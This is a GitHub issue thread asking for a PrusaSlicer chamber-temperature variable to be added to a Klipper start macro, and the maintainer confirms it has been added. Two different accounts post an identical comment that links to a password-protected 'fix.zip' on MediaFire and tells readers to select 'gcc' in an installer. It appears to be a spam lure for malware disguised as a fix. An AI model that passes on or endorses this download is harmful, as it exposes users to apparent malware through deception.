### ISSUE TITLE
Update PrusaSlicer variable with chamber temp

### ISSUE THREAD

**Issue by huskyte** [jontek2/A-better-print_start-macro#11]
With the new release of PrusaSlicer the chamber temp should also be available as variable. Could you update your code to make that work?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jontek2** [comment]
Now added!
